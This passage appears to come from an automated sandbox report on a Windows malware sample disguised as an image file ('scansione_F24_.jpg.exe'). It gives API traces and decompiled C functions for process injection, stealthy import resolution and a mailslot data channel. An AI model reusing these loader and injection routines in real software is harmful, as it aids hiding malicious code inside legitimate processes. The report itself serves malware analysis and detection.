Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
GetLastError.KERNEL32(00000001), ref: 002E1422
HeapFree.KERNEL32(00000000,00000000), ref: 002E1433

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

Strings

D, xrefs: 002E13CE

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 68428

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	E5C7B986B6FD3733504DB3FD6D6FAADA
Total matches:	37
Initial Analysis Report:	Open
Initial sample Analysis ID:	68428
Initial sample SHA 256:	9D2D7459EDA5BC0063FC6EF47DE20AFBFA28AA6981F0EE63D90AE3E10EC4F835
Initial sample name:	scansione_F24_.jpg.exe

Similar Executed Functions

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native

Similarity

Total matches: 84
API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
String ID:
API String ID: 1776017925-0
Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc

APIs

NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

NtClose.NTDLL(00000000), ref: 002E31D4
NtClose.NTDLL(002E618C), ref: 002E31DD

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread

Similarity

Total matches: 29
API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
String ID: USER32.DLL$pnls$pnls
API String ID: 1514306980-1300720345
Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25

APIs

LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520

Strings

USER32.DLL, xrefs: 002E14D3, 002E14D8, 002E14FE
pnls, xrefs: 002E1526
pnls, xrefs: 002E151B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

